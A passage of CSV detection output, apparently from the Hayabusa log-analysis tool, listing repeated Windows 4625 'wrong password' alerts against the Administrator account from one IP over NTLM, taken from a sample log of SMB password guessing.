Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.102 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.139 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.277 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:24.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.770 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.294 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.062 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.194 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.426 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.625 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.663 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.754 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:26.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.115 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.174 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.606 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
